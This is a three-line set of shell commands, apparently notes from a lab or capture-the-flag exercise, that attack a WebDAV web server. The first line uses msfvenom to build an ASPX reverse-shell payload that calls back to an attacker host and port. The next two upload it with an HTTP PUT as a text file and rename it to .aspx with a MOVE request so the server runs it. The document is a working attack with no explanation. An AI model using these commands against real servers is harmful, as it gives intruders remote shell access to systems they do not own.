msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.34 LPORT=1234 -o shell.aspx
curl -X PUT http://10.10.10.15/shell.txt --data-binary @shell.txt
curl -X MOVE --header 'Destination:http://10.10.10.15/shell.aspx' 'http://10.10.10.15/shell.txt'